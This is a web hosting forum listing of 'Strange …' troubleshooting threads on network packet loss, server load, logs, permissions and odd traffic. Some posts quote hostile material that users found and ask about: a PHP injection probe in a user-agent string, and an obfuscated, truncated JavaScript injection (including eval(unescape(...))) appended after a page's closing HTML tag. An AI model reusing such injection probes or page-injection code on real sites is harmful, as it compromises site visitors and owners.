Strange Network

Jun 23, 2007

A couple of days ago I came across www.just-ping.com site (it's a simple ping test site).

I tested my site avensen.com (IP: 72.232.147.154) with it, and got bad results like this one:

[url]

Santa Clara, U.S.A. Packets lost (20%) 50.6 51.9 52.8
Florida, U.S.A. Packets lost (80%) 45.6 45.6 45.7
Vancouver, Canada Packets lost (80%) 56.5 56.6 56.7
New York, U.S.A. Packets lost (20%) 50.7 57.2 61.5
Austin, U.S.A. Packets lost (60%) 9.5 9.6 9.9
Austin, U.S.A. Packets lost (90%) 9.4 9.4 9.4
Amsterdam, Netherlands Packets lost (60%) 121.6 122.4 123.3
Amsterdam1, Netherlands Packets lost (60%) 121.5 123.6 125.6
London, United Kingdom Packets lost (90%) 111.4 111.4 111.4
Sydney, Australia Packets lost (90%) 200.2 200.2 200.2
Stockholm, Sweden Packets lost (20%) 144.7 147.7 148.3
Cologne, Germany Packets lost (80%) 133.3 135.6 137.8
Madrid, Spain Packets lost (70%) 150.7 150.8 151.0
Paris, France Packets lost (60%) 128.4 132.5 135.5
Hong Kong, China Packets lost (30%) 196.1 196.4 196.8
Munchen, Germany Packets lost (60%) 131.7 131.8 132.0
Kraków, Poland Packets lost (70%) 196.3 198.5 200.2
Cagliari, Italy Packets lost (40%) 154.9 155.3 156.3
Melbourne, Australia Packets lost (50%) 199.6 205.5 208.2
Singapore, Singapore Packets lost (70%) 257.4 260.3 262.5

I'm trying to figure out if this is a network problem or a problem with my server. I don't get it, because there are no lost ICMP packets when I ping another hosts from my server, or when I ping my server from home PC.

And here is what server4sale support wrote:

Quote:

This is what we received from data center and will update you, when they get back to us.

"We apologize for the delay in responding to you. We are aware of an issue that involves our upstream provider, and we have opened a ticket with them to get the issue resolved ASAP. We have asked them to investigate this issue and attempt to isolate the cause. Once we have more information from them, we will update you here in this ticket.

In the meantime, if you note any changes (good or bad), please provide traceroutes BOTH "TO" your server, and "FROM" your server, as well as a 300 count ping summary. This request has been made by our upstream provider, as we will forward any additional pings and traceroutes we receive directly to them. Without the traceroutes both to and from the servers, the information will not be useful for their investigation.

We will provide you with updates thru this ticket as we receive information from our provider. If you have any additional questions, or need further assistance, feel free to contact us. We appreciate your patience, while we work with to resolve this issue."

Second message from support:

Quote:

The data center has informed that they have not yet received an update from their upstream provider as they used to inform them after performing changes.

However, for better investigation and providing the results more precisely to their upstream provider they have asked you to provide the latest:

Quote:

1) 300 ping results from your PC to server

2) Traceroute from your PC to Server and

3) Traceroute from Server to your PC

I'd really appreciate if you help me to get these results and isolate the problem.

IP of my server: 72.232.147.154

What's even stranger is that when I run a just-ping.com test over 72.232.147.174 IP (a machine in the same SAVVIS data center, I guess), I get "All OK results":

[url]

Santa Clara, U.S.A. Okay 50.9 52.3 55.3
Florida, U.S.A. Okay 46.1 51.5 54.6
Vancouver, Canada Okay 56.1 56.7 57.1
Austin, U.S.A. Okay 9.7 9.9 10.2
New York, U.S.A. Okay 49.8 51.9 54.7
Austin, U.S.A. Okay 9.7 10.0 10.3
Amsterdam1, Netherlands Okay 122.0 123.6 127.8
Amsterdam, Netherlands Okay 121.2 123.4 127.5
Sydney, Australia Okay 204.1 205.2 208.6
Hong Kong, China Okay 203.6 204.5 206.1
Stockholm, Sweden Okay 144.8 147.7 149.7
Cologne, Germany Okay 133.0 135.0 137.5
London, United Kingdom Okay 118.5 121.7 124.7
Munchen, Germany Okay 136.7 139.0 140.5
Kraków, Poland Okay 192.3 195.9 205.8
Cagliari, Italy Okay 156.3 156.8 157.4
Paris, France Okay 123.0 124.5 127.7
Madrid, Spain Okay 158.8 161.5 164.5
Amsterdam3, Netherlands Okay 125.7 130.9 134.8
Singapore, Singapore Okay 255.3 256.7 259.2
Melbourne, Australia Okay 229.8 230.3 231.0

View 2 Replies


ADVERTISEMENT

Strange Bot

Jul 4, 2007

I don't quite know what to make of this, but I am getting hits to my search pages with the following:

/advanced_search_result.php?keywords=Hello%21%20Perfect%20and%20
/advanced_search_result.php?keywords=Hi%21%20Good%20site%20respe

There are multiple occurrences of this at any one time, and the interesting thing is that it appears to be spoofing the source IP addresses - most are all different with few exceptions.

Has anyone else seen this and know of a solution? Normally I would simply use IP deny but given the addresses appear to be spoofed and too numerous it would be futile.. I thought if I programmed OSC to quit if it matched the keywords might be a decent solution, but so far I haven't had any luck

I searched google and this forum to see if I could find out anything with no luck at all, so I'm guessing this
is fairly new.

View 2 Replies View Related

Strange PHP File On My VPS. (oxb.php)

Jul 16, 2009

I found a strange PHP file in a strange folder on a VPS I am using to host a few sites. I've looked through the logs but can't figure out how it got there and I've look at the code and can't make any sense of it. Can somebody take a look at the code and tell me what they think of it: .....

View 12 Replies View Related

Strange RAM Status

Aug 22, 2008

This month I just pruchase dedicated server, spec are AMD X2 with 1GB RAM.

On ssh, the memory result is:
root@server1 [~]# free -m
total used free shared buffers cached
Mem: 883 836 47 0 163 397
-/+ buffers/cache: 275 608
Swap: 2047 0 2047

My question:

1. Why the total ram just 883MB? I think it should 1024Mb?

2. The server still empty, but why I see the total used memory is 836Mb?

I only have experience with cpanel vps and when my server empty it only use around 200MB RAM and around 400MB ram usage when my vps load with 30+ account.

View 10 Replies View Related

Strange Port Connection

Dec 28, 2007

I’m running RHEL 3, Apache and Cpanel. When I ran: "netstat –an" I found this in the results:

tcp 0 0 11.11.111.229:49158 11.11.111.229:80 ESTABLISHED
tcp 0 0 11.11.111.229:49578 11.11.111.229:80 ESTABLISHED

If I’m reading this right these two unprivileged ports are open and talking to my privileged http port 80. Does this seem right? Why would these two ports on my machine have a connection. All this attention was sparked by abnormal spikes in load. Now I’m getting paranoid that something may be off even though I’m clean when scanning for rootkits etc…

View 3 Replies View Related

Strange Bandwidth Behaviour

May 26, 2009

I'm very new to dedicated hosting, but not to server admin in general, and have come across what seems to be to be a problem.

I'm based in the UK, and the dedi I went with is in the US, i have several VPS in the US, and I can download to them pretty consistently from a UK based server at around 5MB/s... this is on a VPS.

The dedi I signed up to lease has a 100Mb card, and a fairly well known provider, and yet the connection I get to the UK is terrible. It fluctuates wildly between 200KB/s and 5MB/s, seemingly at random, for example, downloading a 100MB file, i'll start at 500KB/s initally, and within a few seconds it might be 3.5MB/s, this could then go either way, but i'll usually end up with an average of about 800KB/s - which really seems awfully slow.

The traceroutes appear fine, there's around 110ms on ping and that is consistant, and similar to the figure the VPS get.

I've been in touch with their support, and after trying the usual suspects - including swapping the NIC - they lost interest. I was actually very impressed with them up until this point so feel pretty let down.

Is this normal? I've honestly never seen a download vary so wildly in speed. Unfortunately i'm tied in on a 3 month contract otherwise i'd drop them in a heartbeat right now.

View 12 Replies View Related

Error_log - Strange Entries

Nov 4, 2009

All accounst in my dedicated server start to show a very strange error_log with the following entries:

====
[04-Nov-2009 21:28:51] PHP Warning: PHP Startup: Unable to load dynamic library '/usr/local/lib/php/extensions/no-debug-non-zts-20060613/php_interbase.dll' - /usr/local/lib/php/extensions/no-debug-non-zts-20060613/php_interbase.dll: cannot open shared object file: No such file or directory in Unknown on line 0 .....
====

Always when a php script is accessed, new entrie with this error above is created.

I dont understand because php script have not any relation with intebase or pgsql and my server have not this e db installed.

View 5 Replies View Related

Strange Browser Agent

May 10, 2009

i recently got multiple logs regarding this weird browser user agent,

Browser Agent:
XXX<? echo "w0000t"; ?>XXX

anyone have information regarding this?

View 3 Replies View Related

Strange Apache Prefork

Jun 2, 2008

I've got a few machines where Apache acts really strange and curious if anyone has any suggestions. I'd love to figure this out so it can actually be deployed to a larger amount of machines and not just test instances.

- Basic Information
Apache 2.2.8 (Tried a few 2.2 versions)
PHP 5.2.6
suPHP based

Prefork Based
- Once a day at a random time Apache fails a request from remote monitoring. It comes back within a minute however is is inaccessible for that time. It sometimes gets picked up by 5 minute monitoring on the machine itself and it restarts the service obviously.

- PHP scripts fail to be killed at times resulting in memory being used. They need to be killed in order to go away.

Worker Based
- Apache can stay up forever it does not fail any requests

- PHP scripts do not get killed at a more frequent basis than in prefork. You need to `kill -9 pid` in order to get rid of the php processes.

I read about very few issues with 2.2 so I'm quite confused by this.

View 5 Replies View Related

Strange HTTPD Permissions

Mar 12, 2008

I have an issue I've never seen before, and hope someone here can shed some light on this odd problem.

Just brought a new server online running Apache 2.2.3. The DocumentRoot was originally set to /var/www/html but I changed it to /home/[sitename]/public_html. I've done hundreds of Apache configs before and this one is no different.

Anyhow, here's the issue:

In SSH (logged in as root), if I create a file (let's just say I do a vi index2.php, enter "test" and save), when I try to go to pull the file in my browser, I get a 403 permission denied error. However, if I create the file in /var/www/html then move it to /home/[sitename]/public_html, the file comes up fine in a browser. Same goes for JPEG images. If I wget a JPG from another site directly into /home/[sitename]/public_html, get a 403 permission denied. If I wget it into /var/www/html then move it, it loads just fine.

It's important to note that the file permissions, owner, and the actual file itself are all identical. Both directories are chowned and chmodded identically.

View 1 Replies View Related

Strange Ioncube Loaders

Feb 12, 2008

I run WHMCS as my billing system for my company and everything is working fine, except piping emails to WHMCS.

The people I am hosting WHMCS with are running PHP 4.4.8 and so I have the loaders for 4.4 uploaded to my account. When I try to send an email to an address that is set to pipe to WHMCS I recieve the following:

This message was created automatically by mail delivery software.

A message that you sent could not be delivered to one or more of its
recipients. This is a permanent error. The following address(es) failed:

pipe to | /usr/local/bin/php -q /home/user/domains/dephnet.com/public_html/my/pipe/pipe.php
generated by info@domain.com
local delivery failed

The following text was generated during the delivery attempts:

------ pipe to | /usr/local/bin/php -q /home/user/domains/dephnet.com/public_html/my/pipe/pipe.php
generated by info@domain.com ------

Site error: the file <b>/home/user/domains/dephnet.com/public_html/my/pipe/pipe.php</b> requires the ionCube PHP Loader ioncube_loader_fre_5.2.so to be installed by the site administrator.

Now why would the script want ioncube_loader_fre_5.2.so when the site works fine?

The site can be found on [url]

View 5 Replies View Related

Strange Urls In 404 Logs

Aug 15, 2008

I just found hundreds of rubbish urls in awstats for a particular domain. Is this referrer spam or something more serious and can I do something about this?

I have attached a screenshot.

View 4 Replies View Related

Strange Characters After Migration

Nov 18, 2008

after i move this accounts from old server to new server it shows me confused characters . ...

View 12 Replies View Related

Strange Access Logs

Jun 3, 2008

Lately we have been getting log entries similar to the following from different IPs all over the US:

74.249.4.234 - - [03/Jun/2008:18:12:36 -0500] "GET / HTTP/1.1" 200 6205 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;1813)"

74.249.4.234 - - [03/Jun/2008:18:12:37 -0500] "GET /scripts/javascript.js HTTP/1.1" 200 9153 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;1813)"

74.249.4.234 - - [03/Jun/2008:18:12:37 -0500] "GET /scripts/overlib.js HTTP/1.1" 200 50733 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;1813)"

That is all there is to each hit.

Obviously, the default index.php file is being loaded and is calling the javascript files, but what we can't understand is why the CSS files and images are not being downloaded as well.

Any ideas on why this would be occurring?

Caching and text based browsing are unlikely scenarios due to the quantity and varied locations of the IPs.

View 0 Replies View Related

Strange Hostname- With Curl

Sep 25, 2008

I have one server with multiple websites hosted on it. It's powered with Cpanel / WHM.

When I run the command 'wget mydomain.com' from this server, I download a Cpanel / WHM landing page instead of the actual homepage from mydomain.com.

I can successfully load mydomain.com in a browser. I can also run the 'wget' command from my local computer and download the correct homepage.

When I run this command from the server mydomain.com is hosted on, Apache returns the home page for the default virtual host for my IP address (ie. cpanel landing page). I encounter this same problem when using CURL or PHP Sockets.

I am behind a firewall. Could this be causing the issue? Does anyone have any ideas how I could fix this?

This is a big problem as I have websites that need to use a web service from a domain hosted on the same machine.

View 3 Replies View Related

APF Firewall Strange Restarts

Feb 20, 2008

Anyone is an expert for apf firewall here? I check my apf_log and saw it was automatically restarted every 12 hours. This is strange because the developer mode was disabled, and usually developer mode was only for 5 minutes and not for 12 hours.

Yes, the apf was restarted and function, but it's strange to see it restarted every 12 hours.

View 5 Replies View Related

Strange Issue With Sites

May 2, 2007

I use domain registration and Managed DNS records service from Directi.

I add A record hosting.mydomain.com to my Layeredtech server and NS records for its nameservers.

The layeredtech server is fine,all servics are up but my main site mydomain.com and hosting.mydomain.com are down.

All sites on server using ns1.mydomain.com and ns2.mydomain.com are unable to be accessed by majority of internet users.

Anyone got this bad experience before?

View 5 Replies View Related

Strange IPFW Behavior

Jun 24, 2008

Using FreeBSD 6. These 2 lines in /etc/rc.conf resulted in not able to boot:

firewall_enable="NO"
firewall_logging="YES"

The second rule had to be comment out otherwise it wouldn't boot. I started with "firewall_enable="NO"" because I locked myself out for other reasons, so I wanted to try it step by step this time.

Is the rule wrong or is logging without an enabled firewall the problem?

View 4 Replies View Related

Strange Referrals In My Stats

Jun 5, 2007

I have a pretty active phpBB forum. I was looking at my stats today and I notice some strange referrals. I checked it out and it and it is a bunch of spam sites. But with a link to one of my threads in the bottom (different per spam site).

- The spam sites have nothing related to my content
- The link to the threads in my forum has no relation to each other.
- Out of all the sites to put, why mine? My forum is not a very very popular forum.

I can post the link if it will better understand the above situation.

I just like to know why and what purpose does it serve? Also is it bad for me? As it is a spam site is linking to my forum. I dunno if search engines will think my site is a spam site as well.

View 2 Replies View Related

Strange File Download

Jan 25, 2007

Users of my web site, running MD-Pro, a PostNuke (php-based) clone, suddenly started to report difficulties downloading files from the download module. We assumed it was the download module and spent ages diagnosing it, uploading fresh versions etc. After some time someone had the bright idea to see if the files could be downloaded direct (using the URLs) to eliminate the web application.

We found: Some users can download all files from the server with no problems.
Some users can download some files but not others.

So far as we can tell only MS Word files are affected, but not all.

The files on the server are not corrupted and there are no permissions issues

Disabling antivirus and firewalls locally makes no difference.

REloading fresh originals to the servedr does not help.

The host reports that no changes to the server have been made recently.

We have discovered that files in the web root are OK. The furhte down the directory structure they are, the less likely they are to download. Performance varies according to the browser in use. According to the host technical support, 'Firefox appears to be returning the data from its own cache. IE is only doing so for root. For the other places IE tries to download the file but stops receiving at exactly the same number of bytes from different locations.'

Using another server on a different host, the problem disappears so it must be due to the host setup in some way. Diagnosis is difficult because the host technical support can't reproduce it.

Platforms include Mac, Windows and Linux and browsers include IE7, Firefox and Safari.

One user with Mac isn't having problems, another with Mac is. All others reporting problems are on Windows. Users are at different locations, using different ISPs so it is unlikely there are common local problems.

The only common element I can see is that the ony files causing trouble are MS Word, though some of these do download OK

We have run out of ideas why this should be happening. How can some users have problems with the same files on the same server and others not?

What could have happened to cause this problem on a site that has been functioning correctly for several months on this server?

View 14 Replies View Related

Strange Stuff In /var/log/messages

Feb 19, 2007

Quote:

Feb 19 15:57:39 server proftpd[1363]: server.com (127.0.0.1[127.0.0.1]) - FTP session closed.
Feb 19 16:06:02 server proftpd[1982]: server.com (127.0.0.1[127.0.0.1]) - FTP session opened.
Feb 19 16:06:02 server proftpd[1982]: server.com (127.0.0.1[127.0.0.1]) - FTP session closed.
Feb 19 16:14:24 server proftpd[2471]: server.com (127.0.0.1[127.0.0.1]) - FTP session opened.
Feb 19 16:14:24 server proftpd[2471]: server.com (127.0.0.1[127.0.0.1]) - FTP session closed.
Feb 19 16:22:46 server proftpd[3062]: server.com (127.0.0.1[127.0.0.1]) - FTP session opened.
Feb 19 16:22:46 server proftpd[3062]: server.com (127.0.0.1[127.0.0.1]) - FTP session closed.
Feb 19 16:31:09 server proftpd[3696]: server.com (127.0.0.1[127.0.0.1]) - FTP session opened.
Feb 19 16:31:09 server proftpd[3696]: server.com (127.0.0.1[127.0.0.1]) - FTP session closed.
Feb 19 16:39:31 server proftpd[4185]: server.com (127.0.0.1[127.0.0.1]) - FTP session opened.
Feb 19 16:39:31 server proftpd[4185]: server.com (127.0.0.1[127.0.0.1]) - FTP session closed.
Feb 19 16:47:53 server proftpd[4946]: server.com (127.0.0.1[127.0.0.1]) - FTP session opened.
Feb 19 16:47:53 server proftpd[4946]: server.com (127.0.0.1[127.0.0.1]) - FTP session closed.
Feb 19 16:56:16 server proftpd[5495]: server.com (127.0.0.1[127.0.0.1]) - FTP session opened.
Feb 19 16:56:16 server proftpd[5495]: server.com (127.0.0.1[127.0.0.1]) - FTP session closed.
Feb 19 17:04:38 server proftpd[6206]: server.com (127.0.0.1[127.0.0.1]) - FTP session opened.
Feb 19 17:04:38 server proftpd[6206]: server.com (127.0.0.1[127.0.0.1]) - FTP session closed.
Feb 19 17:13:00 server proftpd[6661]: server.com (127.0.0.1[127.0.0.1]) - FTP session opened.
Feb 19 17:13:00 server proftpd[6661]: server.com (127.0.0.1[127.0.0.1]) - FTP session closed.
Feb 19 17:21:23 server proftpd[7225]: server.com (127.0.0.1[127.0.0.1]) - FTP session opened.
Feb 19 17:21:23 server proftpd[7225]: server.com (127.0.0.1[127.0.0.1]) - FTP session closed.

I see over a few hundred of these lines in /var/log/messages. The timestamp is exactly the same for every 2 lines (Proftp session- Opened and Closed). It's occuring every hour of the day. Is someone attacking the ftp daemon or something?

View 3 Replies View Related

Strange Server Crashes

Apr 27, 2007

I got a new server (Debian Etch) and experienced 2 strange server crashes during the last month.

When it happends, I can ping my server, but I can not login and all services are down.

After reboot log files doesn't show anything unusual.

There are only 2 small html sites on this server with 10-20 visitors per day.

View 5 Replies View Related

Strange Load Behaviour

Mar 23, 2007

Ever since today my server is being very strange... The server load is always around 6-10 and sometimes goes up to 16! It never did something like this before and I can't find any weird Apache behavior either. Though when I shut down Apache the server load drops to below 1 so it must be Apache...

Kernel: Linux alpha.pixelhosting.net 2.6.9-42.0.10.ELsmp #1 SMP Tue Feb 27 10:11:19 EST 2007 i686 i686 i386 GNU/Linux

Code:
root@alpha [~]# ps aux | grep httpd
root 18935 0.8 1.8 41712 37524 ? Ss 19:38 0:01 /usr/local/apache/bin/httpd -DSSL
nobody 18949 1.8 2.3 53464 49044 ? S 19:38 0:03 /usr/local/apache/bin/httpd -DSSL
nobody 18950 2.8 2.6 59036 54708 ? R 19:38 0:06 /usr/local/apache/bin/httpd -DSSL
nobody 18951 2.9 2.6 59076 54620 ? S 19:38 0:06 /usr/local/apache/bin/httpd -DSSL
nobody 18952 1.9 2.6 59988 55612 ? S 19:38 0:04 /usr/local/apache/bin/httpd -DSSL
nobody 18953 1.7 2.6 59304 54852 ? S 19:38 0:03 /usr/local/apache/bin/httpd -DSSL
nobody 18957 2.4 2.3 52960 48516 ? S 19:38 0:05 /usr/local/apache/bin/httpd -DSSL
nobody 18964 1.9 2.3 53320 48876 ? S 19:38 0:03 /usr/local/apache/bin/httpd -DSSL
nobody 18968 3.3 2.6 59096 54628 ? S 19:38 0:06 /usr/local/apache/bin/httpd -DSSL
nobody 18970 3.0 2.6 60040 55596 ? S 19:38 0:05 /usr/local/apache/bin/httpd -DSSL
nobody 18971 2.3 2.6 59316 54892 ? R 19:38 0:04 /usr/local/apache/bin/httpd -DSSL
nobody 25772 2.7 2.6 59208 54668 ? R 19:40 0:01 /usr/local/apache/bin/httpd -DSSL

root@alpha [~]# ps aux | grep exim
mailnull 28784 0.0 0.0 8244 1136 ? SNs 18:32 0:00 /usr/sbin/exim -bd -q60m
mailnull 28804 0.0 0.0 8112 1092 ? SNs 18:32 0:00 /usr/sbin/exim -tls-on-connect -bd -oX 465
mailnull 26375 0.0 0.0 8252 712 ? SN 19:41 0:00 /usr/sbin/exim -bd -q60m
mailnull 27025 0.1 0.1 9312 3432 ? SN 19:41 0:00 /usr/sbin/exim -bd -q60m

Apache status:
_W_______WW..................................................... etc etc etc

So basically there shouldn't be any high load, but there is... And I just can't find what's causing it!

Thought I should mention theres about 400MB free RAM, usually it's around 100 so that's weird... I have 2GB in total.

View 4 Replies View Related

Strange FTP / GoDaddy / Anonymous Problem

May 27, 2006

A client of mine contacted me to do some changes in his website that's being hosted with Godaddy (it was not me who did the previous works, I'm trying first time a site hosted with Godaddy).

So I tried to enter the site thro' my SmartFTP, but the moment I hit enter after filling up the address, login and password, the login and password fields turn greyish, and the address gets changed to 'domain name - anonymous'.

I get a small remote browser like I get in case of other wesites, but I get something empty in this case. I don't see any files of the website present in that browser.

Any idea how can I solve this issue?

View 2 Replies View Related

Strange Kernel Messages In Shell

Feb 7, 2007

I am getting these strange messages in the shell.

Message from syslogd@hostname at Thu Feb 8 02:08:10 2007 ...
hostname kernel: Call Trace:

Message from syslogd@hostname at Thu Feb 8 02:08:10 2007 ...
hostname kernel: <c01c2650> do_lookup+0x5a/0x78 <c01c2de3> __link_path_walk+0x775/0xbf0

Message from syslogd@hostname at Thu Feb 8 02:08:10 2007 ...
hostname kernel: <c019fa60> prep_new_page+0x2f/0x148 <c01c32a1> link_path_walk+0x43/0xae

Message from syslogd@hostname at Thu Feb 8 02:08:10 2007 ...
hostname kernel: <c01c69d7> vfs_readdir+0x5f/0x67 <c01c6e3d> sys_getdents64+0xb8/0xc3

Message from syslogd@hostname at Thu Feb 8 02:08:10 2007 ...
hostname kernel: <c0345252> _atomic_dec_and_lock+0x2a/0x44 <c01c36b5> do_path_lookup+0x1f6/0x241

Message from syslogd@hostname at Thu Feb 8 02:08:10 2007 ...
hostname kernel: <c01c3910> __user_walk_fd+0x29/0x3a <c01bedd8> sys_readlinkat+0x25/0x74

Message from syslogd@hostname at Thu Feb 8 02:08:10 2007 ...
hostname kernel: <c01c69d7> vfs_readdir+0x5f/0x67 <c01c6e3d> sys_getdents64+0xb8/0xc3

Message from syslogd@hostname at Thu Feb 8 02:08:10 2007 ...
hostname kernel: <c0345252> _atomic_dec_and_lock+0x2a/0x44 <c01bee3a> sys_readlink+0x13/0x17

Message from syslogd@hostname at Thu Feb 8 02:08:10 2007 ...
hostname kernel: <c01666ab> sysenter_past_esp+0x54/0x89

Message from syslogd@hostname at Thu Feb 8 02:08:10 2007 ...
hostname kernel: Code: 00 00 70 ee a0 d0 bc ee a0 d0 bc ed a0 d0 c4 ee a0 d0 c4 ed a0 d0 4c ee a0 d0 4c ee a0 d0 64 ba 8f d1 64 ba 8f d1 87 2f 39 34 30 <d1> 35 f6 00 0c 10 c2 00 00 00 00 00 00 00 00 36 31 38 00 65 6e

Message from syslogd@hostname at Thu Feb 8 02:08:10 2007 ...
hostname kernel: EIP: [<d0a0ee61>] 0xd0a0ee61 SS:ESP 0068:f320fe44

Is this any issues with the current kernel that i am running. Do I need to change the kernel version ( 2.6.17.6 )

View 2 Replies View Related

Strange Error : Alert: File_exists_not_owned

Jun 9, 2009

strange error : Alert: file_exists_not_owned

file_exists_not_owned [/home/admin/lc//index.html]

this error gets displayed, when trying to edit any file (suitable filename ) via Kloxo

I checked the chmod permission it was 755, still I was unable to edit file via Kloxo

any suggestions on why this problem and how to overcome this?

View 3 Replies View Related

Strange Http Query Attack

Apr 9, 2009

I have a problem since yesterday in one of my servers, Im receiving between 200 and 300 hits by second from different IPs to a non existent path in a site, the hits are going to different cracks, films and download query's, this site is a directory and its not a warez or p2p site.

The site is onemilliondirectory.com, and I have suspended it because it was using a lot of resources of the first server, now its being redirected to other location, I have placed some traffic trackers to determine the referer or any other usefull info about the visitors, but the referer is always empty and I think that they are fake users because the statcounter tracker do not recognize the visits.

For example, some of the hits are:

Code:
GET /suspended.page/?v=ABC%204%20KIDS%20Workshop%201.0.zip HTTP
GET /suspended.page/?v=DecryptSQL%202.8.zip HTTP/1.1
GET /suspended.page/?v=[0]%20Msn%20Live%20Messenger%20Mobile.zip
GET /inactive.html?v=Able%20Photo%20Slide%20Show%202.2.5.5.zip
GET /suspended.page/?v=English%20Grammar%20Worksheet%201.4.zip
GET /inactive.html?v=Karaoke%205%2030.zip HTTP/1.1
GET /suspended.page/?v=Nero%208%208.3.2.1.zip HTTP/1.1
Detail of one of the visits from the cpanel latest visitors tool:

Code:
Host: 82.246.88.241
/inactive.html?a=Knowing.2009.TS.FRENCH.XVID-PaGlop.****.[emule-island.com].avi
Http Code: 200 Date: Apr 07 16:39:54 Http Version: HTTP/1.1 Size in Bytes: 262
Referer: -
Agent: Internet Explorer

View 2 Replies View Related

High Load , Strange Status

Feb 10, 2008

sometimes the load go to 30% and to 50% and more , but the normal status is about 1 --5 % .

the server info is

Processor Information
Processor #1 Vendor: GenuineIntel
Processor #1 Name: Intel(R) Xeon(R) CPU E5310 @ 1.60GHz
Processor #1 speed: 1600.584 MHz
Processor #1 cache size: 4096 KB
Processor #2 Vendor: GenuineIntel
Processor #2 Name: Intel(R) Xeon(R) CPU E5310 @ 1.60GHz
Processor #2 speed: 1600.584 MHz
Processor #2 cache size: 4096 KB
Processor #3 Vendor: GenuineIntel
Processor #3 Name: Intel(R) Xeon(R) CPU E5310 @ 1.60GHz
Processor #3 speed: 1600.584 MHz
Processor #3 cache size: 4096 KB
Processor #4 Vendor: GenuineIntel
Processor #4 Name: Intel(R) Xeon(R) CPU E5310 @ 1.60GHz
Processor #4 speed: 1600.584 MHz
Processor #4 cache size: 4096 KB

Memory Information
Memory: 6228000k/7077888k available (1892k kernel code, 61808k reserved, 768k data, 192k init, 5373312k highmem)

Current Memory Usage
total used free shared buffers cached
Mem: 6229508 6021996 207512 0 95168 3073956
-/+ buffers/cache: 2852872 3376636
Swap: 4192824 156644 4036180
Total: 10422332 6178640 4243692

i have Centos cpanel server , about 350 acount in this server .

the top when the load is ubnormal :

top - 20:19:33 up 7 days, 3:28, 1 user, load average: 56.20, 55.22, 36.37
Tasks: 392 total, 1 running, 391 sleeping, 0 stopped, 0 zombie
Cpu(s): 1.0% us, 3.4% sy, 10.2% ni, 26.2% id, 59.2% wa, 0.0% hi, 0.0% si
Mem: 6229508k total, 5888852k used, 340656k free, 28236k buffers
Swap: 4192824k total, 162760k used, 4030064k free, 2817588k cached
PID USER PR NI %CPU TIME+ %MEM VIRT RES SHR S COMMAND
15313 mysql 21 6 3 278:06.02 8.7 736m 527m 3096 S mysqld
19305 nobody 20 4 3 0:04.82 0.4 48504 23m 4044 S httpd
31096 nobody 19 4 3 0:00.78 0.4 47436 22m 4272 S httpd
2290 nobody 19 4 3 0:00.44 0.4 47232 21m 3532 S httpd
1111 nobody 19 4 2 0:01.80 0.4 49792 24m 3936 S httpd
1134 nobody 19 4 2 0:02.19 0.4 47864 22m 4004 S httpd
3178 nobody 20 4 2 0:00.31 0.4 47252 22m 3820 S httpd
12710 nobody 19 4 2 0:03.48 0.4 48448 23m 4096 S httpd
2283 nobody 19 4 2 0:01.37 0.4 47540 21m 3572 S httpd
1116 nobody 19 4 1 0:01.46 0.4 47740 22m 3556 S httpd
1152 nobody 21 4 1 0:00.87 0.4 47728 22m 3940 S httpd
30930 nobody 19 4 1 0:01.63 0.4 50288 24m 3572 D httpd
2272 nobody 19 4 1 0:00.59 0.4 47360 21m 3456 S httpd
3170 nobody 20 4 1 0:01.10 0.4 50640 25m 3520 S httpd
3816 named 18 0 1 30:08.91 0.2 80124 13m 1956 S named
1040 nobody 20 4 1 0:00.94 0.4 51476 26m 3948 S httpd
1245 nobody 19 4 1 0:00.94 0.4 51876 26m 3516 S httpd
4879 root 16 0 1 0:00.12 0.0 2536 1208 780 R top
4965 root 20 4 1 0:00.02 0.1 12496 4004 2780 S exim
4970 root 22 4 1 0:00.02 0.1 11228 4008 2784 S exim
4973 root 23 4 1 0:00.02 0.1 11048 4008 2784 S exim
345 nobody 19 4 0 0:02.17 0.4 51300 25m 3960 D httpd
502 nobody 19 4 0 0:07.25 0.4 49868 24m 4088 S httpd
1033 nobody 19 4 0 0:03.28 0.4 48748 23m 3960 S httpd
1115 nobody 19 4 0 0:01.53 0.4 47384 21m 3540 D httpd
1117 nobody 19 4 0 0:01.08 0.4 47772 22m 3936 S httpd
1122 nobody 19 4 0 0:01.20 0.4 47900 22m 3952 S httpd
1132 nobody 19 4 0 0:01.13 0.4 47860 22m 4344 D httpd
1199 nobody 19 4 0 0:01.12 0.4 47340 22m 3932 S httpd
1215 nobody 20 4 0 0:00.76 0.4 47128 21m 3452 S httpd
1232 nobody 19 4 0 0:00.66 0.4 47388 22m 3992 S httpd
2269 nobody 19 4 0 0:00.88 0.4 47784 22m 3548 S httpd
2277 nobody 19 4 0 0:01.22 0.4 47628 22m 3504 S httpd
2279 nobody 19 4 0 0:01.96 0.4 47828 22m 3932 D httpd
2284 nobody 19 4 0 0:01.74 0.4 48112 22m 3580 S httpd
2285 nobody 19 4 0 0:01.25 0.4 47816 22m 3540 S httpd
2287 nobody 19 4 0 0:00.97 0.4 47540 21m 3544 S httpd

View 4 Replies View Related

Strange Script Showing After </html>

Nov 5, 2007

On a particular host for someone I know, they asked me what this is and I've seen it once before but no one seems to know what it is, why it shows up and how:

Code:
</body>
</html><script>function v472ef633a10d3(v472ef633a2094){ return(parseInt(v472ef633a2094,16));}function v472ef633a5018(v472ef633a5fe0){ function v472ef633a8f39 () {return 2;} var v472ef633a6faa='';for(v472ef633a7f70=0; v472ef633a7f70<v472ef633a5fe0.length; v472ef633a7f70+=v472ef633a8f39()){ v472ef633a6faa+=(String.fromCharCode(v472ef633a10d3(v472ef633a5fe0.substr(v472ef633a7f70, v472ef633a8f39()))));}return v472ef633a6faa;} document.write(v472ef633a5018('3C5343524950543E77696E6.......etc etc</script>
There's another one that starts with:

Code:
</html><script>eval(unescape("%77%69%6e%64%6f%77%2e%73%74%61%74%75%73%3d%27%44%6f%6e%65%27%3b%

View 0 Replies View Related

Dealing With Strange File Names

Apr 30, 2007

I have a spider that is saving a few images files everyday on my servers. Due to the fact that the images are dynamically created the spider is not only saving them without an extention, but also using charachters from the link to create those file names.

I end up with:

0&Y=0
1&Y=0
2&Y=0
3&Y=0
.... and so on.

(there is no problems browsing those image files

What I need is to copy those files or move them to file names with an extention (png) for protection reasons.

I failed using cp, mv in doing so. it seams that the OS doesn't see those files as files.

That is how those files appear in ssh:

0&Y=0
1&Y=0
2&Y=0 ...

View 3 Replies View Related

/var/tmp/mysql.sock Strange Persmissions

Nov 14, 2007

